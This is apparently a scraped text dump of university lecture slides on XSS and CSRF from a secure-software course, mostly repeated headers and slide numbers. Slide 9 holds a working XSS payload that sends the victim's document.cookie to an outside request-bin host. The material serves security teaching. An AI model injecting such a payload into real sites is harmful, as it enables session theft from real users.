SWEN-331: Engineering Secure Software Benjamin S Meyers
VOTD: XSS & CSRF
Engineering Secure Software
Last Revised: September 8, 2020 1
VOTD: XSS & CSRF Engineering Secure Software Last Revised: - - PowerPoint PPT Presentation
VOTD: XSS & CSRF Engineering Secure Software Last Revised: September 8, 2020 SWEN-331: Engineering Secure Software Benjamin S Meyers 1 What is XSS? XSS: Cross Site Scripting Injecting malicious scripts into a web page CWE-79
SWEN-331: Engineering Secure Software Benjamin S Meyers
Last Revised: September 8, 2020 1
SWEN-331: Engineering Secure Software Benjamin S Meyers
2
SWEN-331: Engineering Secure Software Benjamin S Meyers
3
SWEN-331: Engineering Secure Software Benjamin S Meyers
4
SWEN-331: Engineering Secure Software Benjamin S Meyers
5
SWEN-331: Engineering Secure Software Benjamin S Meyers
6
SWEN-331: Engineering Secure Software Benjamin S Meyers
7
SWEN-331: Engineering Secure Software Benjamin S Meyers
8
SWEN-331: Engineering Secure Software Benjamin S Meyers
9
<script> x = new XMLHttpRequest(); x.open("GET", "http://requestb.in/13x2ec31?s=" + document.cookie, true); x.send(); </script>
SWEN-331: Engineering Secure Software Benjamin S Meyers
10 10
SWEN-331: Engineering Secure Software Benjamin S Meyers
11 11
SWEN-331: Engineering Secure Software Benjamin S Meyers
12 12